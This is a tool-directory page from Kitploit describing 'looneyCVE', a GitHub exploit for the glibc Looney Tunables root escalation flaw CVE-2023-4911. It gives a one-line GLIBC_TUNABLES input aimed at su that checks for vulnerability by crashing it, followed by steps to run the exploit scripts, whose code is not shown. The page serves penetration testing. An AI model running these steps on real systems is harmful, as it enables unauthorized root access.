Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
looneyCVE — Looney Tunables CVE-2023-4911 | Kitploit
Tools/GitHubGitHub/teragl/looneycve
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubteragl/looneycve

looneyCVE

Looney Tunables CVE-2023-4911

View Repository
112 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Step 1

Check the glibc version

root@kitploit:~
ldd --version

Check if a machine is vulnerable to Looney Tunables CVE-2023-4911

root@kitploit:~
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help

If we get a Segmentation fault (core dumped), then machine is vulnerable.

Step 2

root@kitploit:~
python3 libc.py

Step 3

root@kitploit:~
gcc -o exp exp.c
./exp
Download Tool